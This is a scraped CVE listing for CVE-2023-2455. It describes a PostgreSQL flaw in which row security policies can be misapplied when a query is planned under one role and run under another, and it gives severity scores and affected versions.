Lucene search

K
cvelistRedhatCVELIST:CVE-2023-2455
HistoryJun 09, 2023 - 12:00 a.m.

CVE-2023-2455

2023-06-0900:00:00
CWE-20
redhat
www.cve.org
4
postgresql
security definer
create policy
role-specific policies
set role

6.6 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

40.4%

Row security policies disregard user ID changes after inlining; PostgreSQL could permit incorrect policies to be applied in certain cases where role-specific policies are used and a given query is planned under one role and then executed under other roles. This scenario can happen under security definer functions or when a common user and query is planned initially and then re-used across multiple SET ROLEs. Applying an incorrect policy may permit a user to complete otherwise-forbidden reads and modifications. This affects only databases that have used CREATE POLICY to define a row security policy.

CNA Affected

[
  {
    "vendor": "n/a",
    "product": "postgresql",
    "versions": [
      {
        "version": "PostgreSQL 15.3, PostgreSQL 14.8, PostgreSQL 13.11, PostgreSQL 12.15, PostgreSQL 11.20",
        "status": "affected"
      }
    ]
  }
]